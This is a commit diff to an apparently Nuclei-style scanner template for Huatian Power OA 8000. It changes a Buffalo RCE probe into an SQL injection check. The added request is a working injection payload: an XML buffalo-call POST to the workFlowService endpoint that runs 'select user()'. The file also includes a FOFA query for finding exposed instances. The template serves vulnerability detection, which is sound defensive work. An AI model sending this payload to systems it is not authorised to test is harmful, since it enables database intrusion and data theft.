Update huatian-oa8000-buffalo-rce.yaml

http/vulnerabilities/other/huatian-oa8000-buffalo-rce.yaml

@@ -1,30 +1,34 @@
-id: huatian-oa8000-buffalo-rce
+id: huatian-oa8000-sqli
 
 info:
-  name: Huatian OA8000 Buffalo - Remote Code Execution
+  name: Huatian Power OA 8000 workFlowService - SQL injection
   author: SleepingBag945
   severity: critical
-  description: Huatian OA8000 Buffalo found to be vulnerable to Remote Code Execution vulnerability
+  description: |
+    There is a SQL injection vulnerability in the workFlowService interface of Huatian Power OA 8000 version, through which an attacker can obtain sensitive database information
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E5%8D%8E%E5%A4%A9OA/%E5%8D%8E%E5%A4%A9%E5%8A%A8%E5%8A%9BOA%208000%E7%89%88%20workFlowService%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
-    max-request: 2
+    max-request: 1
     verified: true
     fofa-query: app="华天动力-OA8000"
-  tags: huatian,oa,buffalo,rce
+  tags: huatian,oa,sqli
 
 http:
   - raw:
       - |
-        GET /OAapp/bfapp/buffalo/ HTTP/1.1
+        POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
         Host: {{Hostname}}
  
-      - |
+        <buffalo-call> 
-        POST /OAapp/bfapp/buffalo/ HTTP/1.1
+        <method>getDataListForTree</method> 
-        Host: {{Hostname}}
+        <string>select user()</string> 
-        Content-Type: application/x-www-form-urlencoded
+        </buffalo-call>
 
     matchers:
       - type: dsl
         dsl:
-          - status_code_1 == 500 && contains(body_1,'Buffalo worker support POST only!') && contains(body_1,'net.buffalo.service.BuffaloWorker.validate')
+          - 'status_code == 200'
-          - status_code_2 == 500 && contains(body_2,'net.buffalo.service.NoSuchServiceException') && contains(body_2,'net.buffalo.service.BuffaloWorker.processRequest')
+          - 'contains(content_type, "text/xml")'
+          - 'contains_all(body,"<buffalo-reply>" ,"<string>user()")'
         condition: and